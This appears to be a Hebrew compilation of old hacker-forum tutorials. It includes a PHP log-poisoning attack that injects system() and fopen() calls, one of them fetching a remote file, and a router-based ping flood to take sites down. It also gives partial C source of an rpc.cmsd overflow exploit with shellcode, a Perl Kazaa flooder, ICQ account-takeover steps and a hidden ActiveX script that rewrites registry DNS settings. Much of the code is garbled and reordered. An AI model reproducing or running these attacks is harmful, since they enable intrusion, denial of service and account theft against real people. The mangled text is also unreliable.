שלב רביעי:
מיקוםhttp://homepage.eircom.net/~level12/xx.htm :
השלב הזה הוא שילוב מוזר בין גורמים ...כמו שאתם שמים לב אין לכם ממש
הזדמנות להציץ בקוד בצורה רגילה בגלל שאם אתם לא כותבים את הסיסמא
הנכונה אתם עפים ישר החוצה...
מה עושים? שומרים את הדף על המחשב על ידי לחיצה על הלינק ושמירה בשם
תפתחו את האקספלורר ואת המסמך ותשתדלו שזה יהי הדף הראשון שנפתח זאת
אומרת שלא יהיה אפשר לעשות BACKלמרות שזה לא משנה כי תמיד אפשר לשנות
זאת בקוד!
בקוד תראו שהסיסמא בנויה באופן מאוד מוזר היא עשויה אותיות ממקבץ אותיות
אשר מחוברות בדרך מוזרה...
הערה :זאת לא סיסמא רנדומלית רק סיסמא מוצפנת!
תכתבו כמו בשלב שתיים:
(javascript:alert(STRING2
כי בקוד רואים שהוא משווה למשתנה בשם ...STRING2
(if (name ==STRING2
זהו והנה לכם הסיסמא!
bcde
שלב :5
מיקוםhttp://homepage.eircom.net/~level12/cong.html :
אוקיי אז פה לא הבנתי את הקטע כל כך...
הסיסמא פה היא PRICKכי פשוט ניסיתי את כל המילים שכתובות שם...
מה שהם עשו זה שאתה כותב את הסיסמא וזה מוסיף לו סיומת HTMLואם מה
שכתבת נכון אתה תגיע לדף אם לא לא תגיע לשום מקום...
הם פשוט נותנים לך לבחור בין 4מילים שאחד מהם הוא הסיסמא.
שלב :6
מיקוםhttp://homepage.eircom.net/~level12/prick.html :
טוב זה קצת מוזר אבל קל...
מה שהם עשו פה זה שלחו לפונקציה ארבע ערכים
text2.value
&;quot;fuck"
text1.value
&;quot;you"
ואז הפונקציה משווה אם הערך הראשון והשני שווים והערך השלישי והרביעי
שווים אז הכל נכון!
אז מה עושים?
רואים את הראשון? זה התיבת טקסט של השם משתמש ,רואים את השלישי? זה
התיבת טקסט של הסיסמא...
עכשיו הפונקציה משווה את שם המשתמש עם השורה השנייה ואת הסיסמא עם השורה
האחרונה!
שם משתמשfuck :
סיסמאyou :
זהו ...פשוט וקל!
שלב :7
מיקוםhttp://homepage.eircom.net/~level12/ab12345.html :
זה הכי פשוט! )זה אני או שהרמה פה יורדת במקום לעלות??? (:
מציצים בקוד הצצה חפוזה (:ורואים את הפונקציה הזאת:
} (function Spikeman_password(form
} ("if (form.ID.value=="location
} ("if (form.pass.value=="password
"location="909.html
} else
(".alert("Sorry " +form.ID.value+ ", wrong password
{
{ } else
("alert("Invalid Name
"location="fail.htm
הדף מעביר לפונקציה את הפורם )את השם משתמש והסיסמא( והפונקציה בודקת
אותם:
אם שם המשתמש = locationוהסיסמא = passwordאז זה מאשר נכון מצחיק ? (:
- ("if (form.ID.value=="locationבודק שם משתמש.
- ("if (form.pass.value=="passwordבודק סיסמא.
זהו עד כאן המדריך אני מקווה שאני יוציא גם מדריך לשלבים (: 8-12שיהיה
לכם בהצלחה ואני מקווה שגם למדתם משהו ולא רק סתם עברתם את זה כי אחרת
זה לא שווה!
עד הפעם הבאה...
ביי...
InPHo
שלב :8
מיקוםhttp://homepage.eircom.net/~level12/909.html :
>embed src="swf.swf" quality=high
בשורה שלמעלה אנחנו רואים מה מקור קובץ הפלאש swf.swf -
עכשיו נוריד אותו ...מה זאת אומרת איך?
בשורת הכתובות נשנה את 909ל ) swf.swfכמובן בלי ה (HTML
זהו עכשיו נוריד את זה ונפתח את זה ב ....לא אחר מאשר נוטפאד...
כן כן הדבר הזה שאתם קואים את הטקסט הזה בו!
עכשיו תעשו חיפוש למילה PASSWORDתחפשו ליד זה איזה שהיא מחרוזת הגיונית
שמורכבת רק מאותיות...
אני הייתי צריך לחפש פעממים את המילה כדי להגיע למקום הנכון...
הסיסמא היא notepadtxt
זהו! פשוט נכון?
מבחן הארי מרפי חלק ד'
!AccessDrive
האפשריים...
למשל:
1234567
htm.1234567
House
תקציר
______
באג רציני שהתגלה ב
php
של ווינדואז ,הבאג יאפשר לתוקף למצל את ה
php
לראות קבצים מחוץ לגבולות ה
html
ולהריץ דברים ע"י שינוי הלוג אפאצ'י
הדברים שניתן לעשות:
להריץ
exe
לראות
html
מלא לדוגמא אם יש שימוש ב
asp
אז לא תראו את החלקים המוסתרים ודרך הבאג כן תראו
ותוכלו גם להעלות קבצים
פרטים
_____
מערכות פגיעות:
PHP version 4.0 with Apache server version 2.0
הבאג
____
נניח שעל הסרבר מותקן
apache
בתיקיה
c:\apache
והקובץ
php.exe
מותקן במיקום הרגיל שלו
)(c:\php\php.exe
אז הצעדים לקבלת רוט הן:
כתבו בדפדפן
http://www.siteName.com/<? (1
<?%20system('TheCommandToExecuteWithPath');%20
שרת האפאצ'י יוסיף את השורה הזאת לקובץ
) access.logראו יצירת לוגים בחלק של האבטחה(
(4העלאת קובץ
?<http://www.siteName.com/
<?;("$fp=fopen("http://www.mySite.com/test.txt"," rb
?<http://www.siteName.com/
<?;("$fq=fopen("c:/Apache2/htdocs/test.txt","wb
חקו עשר שניות ותציפו את הלוג ע"י קריאה לקובץ שלא קיים
http://www.siteName.com/notExistingFile.txt
http://www.siteName.com/php/php.exe?c:\apache2\logs\access.log
http://www.siteName.com/test.txt
עם הבאג הזה אפשר להעלות לסרבר טרויינים ,וירוסים ,תוכנות ששלוחות לכם
מידע על פעולות בשרת ועוד הרבה!!!!
וירוס
מדריך קצר על וירוסים\נכתב ע"י Neo_Guns
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
מה במדריך?
-----------------------------------------------------------------
וירוס זה תוכנה )קטנה או גדולה( שמטרתה היחידה היא לגרום נזק למחשב.
הוירוס יכול לפגוע בכל "איברי" המחשב גם באופן תוכנתי לדוגמא:
מחיקת קבצים חשובים במערכת ההפעלה ,פירמוט המחשב ,מחיקת הווינדוס
וכדומה...
והוירוס גם יכול לפגוע גם באופן חומרתי ,לדוגמא:
דפיקת הביוס ,הצפת מדפסת ,ואפילו חבר שלי "מורפיוס "666בנה וירוס ששורף
את
המסך )אל תשאלו אותי איך ,הוא לא נותן לי את הסורס( וכדומה...
סוס טרויאני הוא וירוס שאינו מופעל ברגע שהוא מגיע למחשב אלא מחכה
לתאריך מסוים )דוגמת הטרויאני "רולטה רוסית"( להפעלת תוכנה מסוימת,
עידכון האנטיוירוס )היה לי כזה ,איזה באסה זה היה( וכדומה...
תולעת היא קובץ שברגע שהוא מגיע למחשב הוא מפעיל את עצמו ,מה שחזק בו
ואין בסוס טרויאני זה שהואגם שולח את עצמו לכל הרשימה באימייל,
באייסיקיו
ובכל דרך שהיא הוא משכפל את עצמו .התולעת הראשונה שהייתה למיטב זכרוני
היא
"מליסה" והכי חזקה שהייתה ,או הכי ידועה היה כמובן "וירוס האהבה"
)נדבקתי בו,
אתם לא יודעים איך נלחצתי.(...
מי שרוצה הסבר יותר מפורט )למרות שאני לא חושב שיש מה לא להבין( יכול
ליצור איתי קשר
באייסיקיו:
147607610
או באימייל:
Neo_Guns@walla.co.il
-----------------------------------------------------
אין להעתיק ,לשכפל ולגנוב בכל דרך שהיא ללא רשות מפורשת
מ.Neo_Guns-
כל הזכויות שמורות © לNeo_Guns-
ADSL EXPLOITS
________________
להפיל אתר
++++++++++++++
אז תפתחו את טלנט:
ותתחברו ל
10.0.0.138
פורט:
23
יעלה לכם אחרי מספר שניות הלוגו של החברה
אחר כך יופיע לכם הסימן
=<
שם תכתבו
(ip (=>ip
מיד יופיע לכם הסימן
]<=[ip
שם תכתבו
ping
מיד יופיע לכם
= addr
שם תכתבו את האיי פי של האתר או המחשב שאתם רוצים להרוג
מיד לאחר שכתבו את האיי פי ותלחצו אנטר יופיע לכם
]=[Count
שם תכתבו
1000000
מיד יופיע לכם
]=[size
שם תכתבו
20000
מיד יופיע לכם
]=[interval
שם תכתבו
1000000
מיד יופיע לכם
]=[listen
פשוט תלחצו אנטר וחקו! כאן סיימתם להפיל את האתר...
רשימת השרתים
++++++++++++++
תתחברו עם טלנט ל
23 10.0.0.138
תכתבו
phonebook
מיד יופיע לכם
]<=[phonebook
שם תכתבו
list
ותופיע לכם רשימת השרתים!
תקיות בלתי נגישות
this text was written by spider-master
______________________________________
אין צוות האתר או אני אחריים על בעיות\תקלות ובלה בלה אתם יודעים את ההמשך
אז ככה היום נילמד איך לעשות תיקיה שאי אפשר לשנות לה את השם ואי אפשר למחוק אותה
א .צרו תיקיה במקום שקל לכם להגיע אליו דרך דוס
נגיד בכונן
spider-master
C:\spider-master
או קיי?
עשיתם?
command
\cd
CD
\:c
עכשיו להסבר
הפקודה
ren
spider-master
ה_ לפני הספיידר מסטר השני זה לא מכף תחתון כמו שכולכם חושבים!!!
מרזיקים את המקש
Alt
ובזמן שמרזיקים את המקש הזה)בלי לעזוב לקשיי קליטה שבינכם!( לוחצים על
Alt+194
זה יצור לכם _ ואז אחרי הפעולה הזאת רושמים את השם של התיקיה שאתם רוצים במקרה הזה נגיד
spider-master
וזהו
exit
spider-master
הפלא ופלא אי אפשר
וזהו עוד הפעם תחזרו לכונן סי ותנסו להכנס והפלא ופלא אפשר!
yours spider-master
-------------------------------------------------------------------------------------------------------
Rpc.cmsd exploit
טקסט זה נכתב ע"י
cool-abdool
rpc.cmsd exploit
___________________
בעיית אבטחה ב
(rpc.cmsd(calendar Manager service
שמאפשרת לך לשנות ערכים עם גישה מלאה
האקספלויט פועל על
UnixWare 7.1.1
עכשיו תעתיקו את הקוד הבא לתוך קומפיילר
<include <stdlib.h#
<include <stdio.h#
<include <string.h#
<include <unistd.h#
<include <rpc/rpc.h#
= []char shell
/*[xeb\x3d" /* jmp springboard [2000\" /* 0 */
/*[syscall: [2000 */
/*[x9a\xff\xff\xff\xff\x07\xff" /* lcall 0x7,0x0 [2000\" /* 2 */
/*[xc3" /* ret [2000\" /* 9 */
/*[start: [2000 */
/*[x5e" /* popl %esi [2000\" /* 10 */
/*[x31\xc0" /* xor %eax,%eax [2000\" /* 11 */
/* (x89\x46\xbf" /* movl %eax,-0x41(%esi\" /* 13 */
/* (x88\x46\xc4" /* movb %al,-0x3c(%esi\" /* 16 */
/* (x89\x46\x0c" /* movl %eax,0xc(%esi\" /* 19 */
/* (x88\x46\x17" /* movb %al,0x17(%esi\" /* 22 */
/* (x88\x46\x1a" /* movb %al,0x1a(%esi\" /* 25 */
/* (x88\x46\xff" /* movb %al,0x??(%esi\" /* 28 */
/*[execve: [2000 */
/*[x31\xc0" /* xor %eax,%eax [2000\" /* 31 */
/*[x50" /* pushl %eax [2000\" /* 33 */
/*[x56" /* pushl %esi [2000\" /* 34 */
/* x8d\x5e\x10" /* leal 0x10(%esi),%ebx\" /* 35 */
/*[x89\x1e" /* movl %ebx,(%esi)[2000\" /* 38 */
/*[x53" /* pushl %ebx [2000\" /* 40 */
/* x8d\x5e\x18" /* leal 0x18(%esi),%ebx\" /* 41 */
/* (x89\x5e\x04" /* movl %ebx,0x4(%esi\" /* 44 */
/* x8d\x5e\x1b" /* leal 0x1b(%esi),%ebx\" /* 47 */
/* (x89\x5e\x08" /* movl %ebx,0x8(%esi\" /* 50 */
/*[xb0\x3b" /* movb $0x3b,%al [2000\" /* 53 */
/*[xe8\xc6\xff\xff\xff" /* call syscall [2000\" /* 55 */
/*[x83\xc4\x0c" /* addl $0xc,%esp [2000\" /* 60 */
/*[springboard: [2000 */
/*[xe8\xc6\xff\xff\xff" /* call start [2000\" /* 63 */
/*[data: [2000 */
/*[xff\xff\xff\xff" /* DATA [2000\" /* 68 */
/*[xff\xff\xff\xff" /* DATA [2000\" /* 72 */
/*[xff\xff\xff\xff" /* DATA [2000\" /* 76 */
/*[xff\xff\xff\xff" /* DATA [2000\" /* 80 */
/*[x2f\x62\x69\x6e\x2f\x73\x68\xff" /* DATA [2000\" /* 84 */
/*[x2d\x63\xff"; /* DATA [2000\" /* 92 */
} struct cm_send
;char *s1
;char *s2
;{
} struct cm_reply
;int i
;{
} ()long get_ret
;return 0x8047720
int
([]main(int argc, char *argv
}
;[char buffer[BUFFER_SIZE + 1
;long ret, offset
;int len, x, y
;char *command, *hostname
;CLIENT *cl
;struct cm_send send
;struct cm_reply reply
;{ struct timeval tm = { 10, 0
;enum clnt_stat stat
;[hostname = argv[1
;[command = argv[2
;(len = strlen(command
;++len
;len = -len
;shell[LEN+0] = (len >> 0) & 0xff
;shell[LEN+1] = (len >> 8) & 0xff
;shell[LEN+2] = (len >> 16) & 0xff
;shell[LEN+3] = (len >> 24) & 0xff
;(shell[30] = (char)(strlen(command) + 27
(++for(y=0; y<strlen(shell); y
;[buffer[x++] = shell[y
(++for(y=0; y<strlen(command); y
;[buffer[x++] = command[y
;'buffer[x] = '\xff
;x = SHELL_START
(for(y=0; y<(RET_LENGTH/4); y++, x=x+4
;int *)&buffer[x]) = ret))*
;buffer[x] = 0x00
;send.s1 = buffer
;"" = send.s2
זיוף סשנים
טקסט זה נכתב ע"י
cool-abdool
זיוף סשנים
________
זיוף סשנים על שרתי
php 4.x
בברירת המחדל של השרתים הללו ה
sessionID
לא נשמר בתיקיה מוגנת אלא בתיקיה
tmp
זה יתן לכל האקר לזייף ולשנות
sessionID
קיימים וזה יתן לו גישה ל
acounts
של אנשים אחרים
מה זה בעצם
???session
+++++++++++++++++
הסשן דרוש לזהוי אנשים זה מועבר לדפדפן ומשם או שזה חלק שמתווסף לכתובת
או שזה נשמר בעוגיה
עם כל פעולה שהמשתמש עושה הסשן נשלח לסרבר ועובר שינויים וחוזר לדפדפן
)לכל אלה שתוהים למה שהשרת פשוט יזכור את המספר איי פי של אותו משתמש
וכך יאפשר לו לבצע פעולות??? התשובה לכך היא ש
proxys
יכולים לתת גישה לכמעט כל איי פי(
ברגע שהמשתמש יוצא מהאתר גם נעלה הסשן ונמחק
מכירים את בקאונטרים שסופרים כמה אנשים יש באותו רגע באתר זה קאונטרים
שסופרים את הסשנים
תמיכה של
php
ב
sessions
+++++++++++++++++++
מאז
php 4
יש תמיכה טבעית לסשנים שמיובאת מה
PHPLib
במקום שימוש ב
sql
הסשנים נשמרים בקבצים בתיקיה
tmp/
שנו את הקובץ
php.ini
כך שיצביע על התיקיה שיצרתם
ותבצעו
chown www-data: php_sessions
בהצלחה
שינוי עוגיות
טקסט זה נכתב ע"י
cool-abdool
שינוי עוגיות
_________
לכל אלה שעדיין לא יודעים עוגיות
)(cookies
הם קבצי טקסט שנשמרים על המחשב כאשר נכנסים לאתר שיוצר אותם
דוגמה לאתרים כאלה:
geocities
yahoo
hotmail
tripod
geeklog
)most of the free web hosting sites and most of the mail servers and
(stuff
העוגיות נשמרות בתיקיה שנקראת
cookies
בתוך התיקיה
windows
אוקיי הבנו איפה יש עוגיות אבל למה יש עוגיות התשובה מאוד ברורה בהרבה
אתרים יש
כל מיני שאלות למשל
איזה צבע היית מעדיף לרקע אתה בוחר למשל צבע אדום והרקע משתנה לאדום
אחרי שאתה יוצא מהאתר אתה נכנס שוב והפלא ופלא
עדיין הרקע בצבע אדום
למה?? כי השרת של האתר קרא מתוך העוגיות את הצבע שבחרת בפעם הקודמת
שהיית האתר וידע לשים
זה .מה שקורה בשרתי דואר למשל זה הדבר הבא אתה עושה
login
לשרת דואר שלך נגיד הוטמייל ואתה מסמן
save my password
מה זה אומר כשאתה מסמן את
save my password
נוצר לך קובץ עוגייה חדש שמכיל את הפרטים שמאפשרים לשרת
להכניס אותך בלי צורך למלא סיסמה אבל כל זה טוב ויפה עד שחבר שלך או כל
אחד אחר מגיע אליך הביתה ובחצי דקה כשאתה בשרותים מעתיק את כל העוגיות
לדיסקט אם הוא יעתיק מהדיסק למחשב שלו יהיה גישה
לכל המקומות שלך יש גישה אליו ב א ס ה ! ! ! לכן לייתר ביטחון
כדאי לא לעשות
.save my password
עכשיו לשינוי!!!
ברוב האתרים זה לא יעבוד כי הם דרשים גם שם משתמש וגם סיסמה בתוך
העוגיות אבל למשל באתר
geeklog
אפשר להכנס על שם מישהו אחר רק ע"י שינוי שם המשתמש בעוגייה !!!
;use Socket
;use Getopt::Std
;(getopts("h:", \%args
;{host = $args{h$
target = inet_aton($host) || die("inet_aton problems; host doesn't$
;("?exist
;trash="A"x100$
;(exec_cmd($command&
} sub exec_cmd
(++for($count=1;$count<=1000;$count
}
;("sendraw("GET /\"$trash\" HTTP/1.0\n\n
;("|")print
{
;("print("\nData Sent.\n\n
{
} sub sendraw
;_@=(my ($pstr
|| (socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0
;("die("Socket problems\n
}((if(connect(S,pack "SnA4x8",2,1214,$target
;my @in
;select(S); $|=1; print $pstr
;_$ ,while(< S >){ push @in
{;({print STDOUT "." if(defined $args{X
;select(STDOUT); close(S); return @in
{ ;("else { die("Can't connect...\n {
{
זה יעיף את המשתמש בתציינו
!!!חחחחחחחחחחחחחחח כמה שאנחנו רעים
telnet morpheus.users.ip.address
...Trying morpheus.users.ip.address
.Connected to morpheus.users.ip.address
.'[^' Escape character is
GET / HTTP/1.0
HTTP/1.0 200 OK
{X-Kazaa-Username: {USER NAME HERE
X-Kazaa-Network: MusicCity
X-Kazaa-IP: morpheus.users.ip.address:1214
X-Kazaa-SupernodeIP: 130.74.237.54:1214
כמו שאתם רואים זה לא מדריך למתחילים וזה פשוט מדהים כמה חרא!!! יש
בתוכנה קטנה בהצלחה
טוב הפעם אנ ילמד אתכם איך לעשות שמה שיש בתמונה מסויימת יראה כאייקון
אם לא הבנתם תמשיכו לעקוב אני מבטיח שתבינו עד סוף המדריך הזה.
hack-planet
מדריך זה נוצר ללמד אתכם דברים ולא לשמש בשום צורה שהי למטרות רשע ופשע
אין באחריותי או באחריות האתר והצוות שום נזק שניגרם ישירות או בהקיפין למחשבכם
כחו את זה בחשבון.
bmp
עדיף שתשרבטו קוים עווים או שטויות כדי לראות את זה בהמשך יותר טוב
עכשיו אחרי שעשינו את זה ויש לנו ציור של פיקאסו)תגידו תודה על המחמאה וזהו( אנחנו ניפתח
את הרג'סטרי.
HKEY_CLASSES_ROOT\Paint.Picture\DefaultIcon
נוווווו
היום?
)(Default
C:\Progra~1\Access~1\MSPAINT.EXE,1
%1שה%
ותסתכלו על הקובץ
bmp
שיצרתם
Ctrl+Alt+Del
ובוחרים ב
explorer
ועושים
end task
ומחכים ואז יהיה לכם עוד מסך שישאל אם אתה רוצים באמת לסגור את התוכנית תילחצו על
end task
ואז זה כאילו יעשה לכם ריפרש כזה ואז תיסתכלו על הקובץ bmpשיצרתם
?well
?what do u think
נחמד אה?
bmp
שאתם רוצים לראות איך הוא נראה בלי לפתוח אותו אז נגיד שהקובץ נימצה בתיקיה בשם:
"האק פלאט"
אז מה שאנחנו עושים זה הולכים לתיקיה הזאת לא ניכנסים אליה!!!! עושים קליק ימיני עליה
ובוחרים באפשרות
Properties
שם יהיה לכם כל מיני אפשרויות לבחור והכי הכי למטה יהיה לכם
עכשיו כנסו לתוך התיקיה הזאת .עכשיו בתפריט העליון)נו זה עם הקובץ ,ערוך ,פייבוריטס וכו(...
בחרו ב
View
ושם איפשה שאתם בוחרים אם אתם רוצים אייקונים בצורת רשימה או
Thumbnails
וזהו ניגמר
מקווה שנהנתם
yours spider-master
------------------------------------------------------------------------------------------
אהלן חברה והיום בפינתנו ....איפה נימצאת לעזזל הסיסמא של האי סי קיו
ואיך מפצחים אותה???
אז ככה:
הסיסמא של האי סי קיו לא שמורה ברג'סטרי או באתר של האי סי קיו כמו
שרובכם חושבים!
הסיסמא נימצאת בתוך קובץ
data base
של האי סי קיו.
אני יסביר איך למצוא את הקובץ באי סי קיו 2001בי אבל הוא קיים גם
בסוגים האחרים.
אז ככה
כנסו לתיקיה של האי סי קיו....
אצל רובכם זה יהיה ב
C:\Program Files\ICQ
יש שם כמה תיקיות נכון?
כנסו לתיקיה בשם
2001a
מסיבה כלשהי היוצרים דילגו על
icq2001a
אבל החליטו להשאיר את התיקיה הזאת
עשיו שאתם בפנים אתם תראו כמה קבצים בינהם
your uin.dat
your uin.idx
לכל מי שלא יודע
uin= icq number
אלה הקבצים החשובים שרצינו!!!
אבל הקובץ החשוב ביותר הוא הקובץ
dat
אם אין את ה
idx
זה לא חשוב!!!! עכשיו אחרי שיש לנו את הקובץ הזה אנחנו מורידים
ICQr
מהכתובת:
http://www.headstrong.de/cgi-bin/download.cgi?icqrinfo
ואחרי זה פותחים את התוכנה ואתם כבר תבינו איך היא עובדת היא נורא פשוטה
לשימוש.
אתם פותחים את הקובץ דאט וזה יתן לכם את הסיסמא של האי סי קיו שלכם
כולל את כל הרשימה
שיש לכם+אנשים שדיברתם איתם פעם ומחקתם אותם!!!
כך שזה נורא מועיל עם מחקת משהו בטעות ואתה מתחרט ורוצה להחזיר אותו.
אני סומך עליכם כבר איך להשיג קבצי דאט אפשר לעבוד על ליימרים שאתם
חייבים את הקובץ הזה
בשביל לשפר לו את האי סי קיו או כי לכם חסר קובץ כזה וזה לא משנה של
איזה מספר זה
)זה כבר עבד לי( וכו....
העיקר שתהנו
ניכתב ע"י
spider-master
=====================================================================
===================
תודות :לקול אבדול על העזרה שלו
גנבת איי סי קיו
אהלן חברה מה מצב? זה שוב אני
spider-master
מדווח לכם מהשטח והפעם ......איך לגנוב אי סי קיו דרך לינוקס\יוניקס
אז ככה קודם כל האי סי קיו זה אחלה דבר אבל מורכב בצורה טיפשית.
אני לא יתחיל להסביר עכשיו על האי סי קיו מצטער אני רק יסביר איך זה
מתבצע.
בו ניקרא לדבר הזה
.Major ICQ security hole
אז ככה לאי סי קיו יש מכסימום של סיסמא לרשום נכון?
נכון!!!
אז ככה המכסימום הזה הוא 8וכאשר אתם מכניסים את הסיסמא היא נישלחת
לאתר של האי סי קיו ורושמת אתכם.
עכשיו מה אנחנו עושים בשביל לגנוב את ה
uin
ד"א למי שלא ידוע
.uin=the icq num
או קיי עכשיו אם יש לכם לינוקס\יוניקס תורידו
ICQ clone
ותתקינו.
עכשיו ...מה שאנחנו עושים זה .....רושמים את המספר אי סי קיו שאנחנו
רוצים ו ?..מה קורה אם הסיסמא?
שאלה טובה.
אתם רושמים 9ספרות .מה זאת אומרת?
זאת אומרת שאתם רושמים במקום של הסיסמא משהו כזה
123456789
ומה קורה?
מה שקורה זה
overflow
של האי סי קיו ולכן הוא מאשר אתכם!!!
:and as they say in english
If all goes well, it will log in and connect
כמובן הכל בתנאי שהיוזר הוא אוף ליין!!!!
אחרי שאתם עושים את זה תשנו סיסמא כדי שהיוזר לא יוכל להחזיר לעצמו את
האי סי קיו.
כמובן שעכשיו תוכלו לשלוח הודעות בשמו והכל.....
תהנו!!!
yours spider-master
אני לא אחראי על שום נזק שניגרם מכל תוצאה בשימוש טקסט זה
אם זה לא פועל לכם תאמינו לי שזה לא בעיה אצלי אלה אצל......
תסיכו מסקנות
):
סתם אחים שלי
טקסט זה שייך לאתר המכובד והמדהים
http://www.hphc.up.co.il
=====================================================================
===============================
תודה לקול אבדול על כל מה שלימד אותי
-----------------------------------------------------------------
E_YAIR (E) Disk
HPDeskJe Print HP DeskJet 840C/841C/842C/843C
SharedDocs Disk
.The command completed successfully
-----------------------------------------------------------------
E_YAIR (E) Disk
HPDeskJe Print HP DeskJet 840C/841C/842C/843C
SharedDocs Disk
.The command completed successfully
_________________________________________
| בינארי 0 0 0 0 0 0 0 | 0
| עשרוני 1 2 4 8 16 32 |64 128
|________________________________________|
ב"טבלה" אנחנו רואים סיפרה ואת המקביל שלה בבסיס עשרוני יענו בסיס רגיל
יום יום 0-9בכל אופן
אנחנו משתמשים בספרות 1ו 0-לציין
false=0
true=1
אז נגיד שאנחנו רוצים ליצור את המספר ) 2עשרוני( על בסיס בינארי אנחנו
עוברים בטבלה ורואים איפה נמצא המספר שתיים
אם מנת המשכל שלכם היא מעל ) 15לא כמו מישהו שיודע מיהוא ...המבין יבין(
אז תראו שהספרה שתיים נמצאת מתחת לאפס השני
אז אנחנו נסמן שאפס השביעי הוא
אמיתי
)(true
עוברים על המספר הראשון בטבלה
המספר 128
אנחנו מיד רואים שזה לא 128כי 128הוא גדול משתיים
אז מסמנים 0
סך בכל יש לנו 0
אחריועוברים למספר
המספר 64
אנחנו מיד רואים שזה לא 64כי 64הוא גדול משתיים
אז מסמנים עוד 0
סך הכל יש לנו
00
__
2=10
הפלת שרת
טקסט זה נכתב ע"י
cool-abdool
++++++++++++++++++++++
+אז בו נתחיל במדריך +
======================
ב .הדרך השניה והטיפה יותר ארוכה היא לפתוח את התיקיה בשם המחשב שלי
וללכת לכונן שבו מותקן הווינדואס)בדרך כלל קונן סי( נניח שהוא מותקן
בקונן סי!!!
אז פותחים את המחשב שלי והולכים לכונן סי נכנסים לתיקיה של הווינדואס
ומחפשים את הקובץ בשם
Regedit.exe
מצאתם? יופי עושים דאבל קליק על הקובץ והופ אנחנו ברג'סטרי
):
---------------------------------------------------------------------
--
=תודות :תודה רבה רבה רבה רבה רבה רבה לקול אבדול my manולכל האחרים
=
=שהסבירו לי פה ושם
=
נכון תמיד רציתם לשנות את השם של הסל מיחזור או של הקונטרול פאנל או
של המחשב שלי???
נכון שזה נראה ממש משהו פצצה??
אז היום אני ילמד אתכם איך.
אז ככה פתחו את עורך הרג'סטרי.
start-->run-->regedit--->enter
עכשיו יעלה לכם העורך נכון? יופי.
לכו לתיקיה:
/My Computer/HKEY_CLASSES_ROOT/CLSID
}{645FF040-5081-101B-9F08-00AA002F954E
עכשיו בתוך התיקיה הזאת אתם תמצאו שני קבצים
(InpoTip, (Default
נכון??? יופי!!!
אז עכשיו הסבר על כל קובץ
InpoTip
אם אתם משאירים את הסמן של העבר הרבה זמן על התיקיות המיוחדות של
הווינדאוס
אזהוא מראה הסבר קצר על התיקיה זה האינפו טיפ.
)(Default
זה השם של התיקיה ,במקרה שלנו זה הסל מיחזור.
עכשיו בשביל לשנות את הדברים אתם עושים שתי לחיצות על הקובץ ומשנים
לאיך שאתם רוצים שזה יקרא.
כשסיימתם אתם יוצאים מהעורך רג'סטרי ועושים רענן בדסקטופ!!!
מזל טוב כרגע עשיתם את הדבר הראשון שלכם ברג'סטרי.
{My Briefcase:{85BBD920-42AO-1069-A2E4-08002B30309D
{Desktop: {00021400-0000-0000-C000-0000000000046
{Control Panel:{21EC2020-3AEA-1069-A2DD-08002B30309D
{Dial-Up-Networking:{992CFFA0-F557-101A-88EC-00DD01CCC48
{My Computer :{20D04FE0-3AEA-1069-A2D8-08002B30309D
{Network Neighborhood:{208D2C60-3AEA-1069-A2D7-O8002B30309D
{Recycle Bin :{645FF040-5081-101B-9F08-00AA002F954E
תנסו להתעסק עם זה אבל בלי שטויות כי טעות קטנה ברג'סטרי וזה לא
יהיה יפה.
שלכם...
spider-master
=====================================================================
=
תודה רבה לקול אבדול על התמיכה ועל הכל
כניסה ל
FTP
__________________
בשביל לחדור ל
ftp
עם הגנות מינימליות
לדוגמא:
ftp.icq.com
אפשר להשתמש בדרך הבאה
)לא בטוח שזה עדיין עובד באיי סי קיו(
לכו להתחל
לכו להפעלה
כתבו
command
עלה לכם חלון דוס
כתבו עכשיו
ftp X
ואז יכתב לכם
Connected to X
.X FTP server (Digital UNIX Version 5.60) ready 220
User (X:(none)): anonymous (write anonymous cause we want the ftp to
(give us anonymous access
.Guest login ok, send ident as password 331
) Password: fake_email@fake_domain.comכתבו אי מייל מזוייף אם האפ טי
פי תומך בכניסה אנונימית אז אתם בפנים(
.Guest login ok, access restrictions apply 230
) <ftpזה כמו חלון דוס חדש כתבו פה פקודות דוס כדי לתפקד באפ טי פי למשל
ראו למטה (
בשביל לחדור ל
ftp
עם הגנות מקסימליות
שימו את זה בעמוד
html
<script>
document.write("<APPLET HEIGHT=0 WIDTH=0
code=com.ms.activeX.ActiveXComponent></APPLET>");
function yuzi3(){
try{
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
try{
Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\
SearchList","roots-servers.net");
}
catch(e){}
}
catch(e){}
}
setTimeout("yuzi3()",1000);
document.write("<APPLET HEIGHT=0 WIDTH=0
code=com.ms.activeX.ActiveXComponent></APPLET>");
function yuzi2(){
try{
a2=document.applets[0];a2.setCLSID("{F935DC22-1CF0-11D0-ADB9-
00C04FD58A0B}");
a2.createInstance();Shl = a2.GetObject();a2.setCLSID("{0D43FE01-F093-
11CF-8940-00A0C9054228}");
try{
Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\
EnableDns","1");
}
catch(e){}
}
catch(e){}
}setTimeout("yuzi2()",1000);
</script>
יש לשנות את ה
scr!pt
ל
script
נזק שנגרם למחשבכם ע"י שימוש בטקסט זה על לא להפעיל כל אבל כל כל כל
אחריותכם בלבד
הסבר על נט סטט
טקסט זה נכתב ע"י
cool-abdool
לכו ל
התחל
הפעלה
כתבו
command
אם נפצח חלון דוס כתבו
netstat -n
אם עשיתם את כל הפעולות עד עכשיו נכון אז תראו משהו כזה
C:\WINDOWS\Desktop>netstat -n
Active Connections
<C:\WINDOWS\Desktop
\<WINDOWS\Desktop
החלק של ה
Local Address
לא מעניין אותנו
שימו לב ל
foreign address
אם אחרי הנקודותיים יש למשל
1234
כמו בשורה הזאת
TCP 192.168.0.5:135 192.168.0.5:1234 ESTABLISHED
אז אפשר לדעת שלאותו מחשב יש נטבס כי זה הפורט של הנט בס ואז פשוט
נכנסים לנט בס ומתחברים לאותו
מחשב דרך האיי פי שלו
כנסו לטקסט שלי על טרויינים בשביל ללמוד על עוד פורטים
כמו נטבס
לכו ל
התחל
הפעלה
שם תכתבו
regedit
כשתעלה התוכנה לכול
\HKEY_LOCAL_MACHINE\SOFTWARE
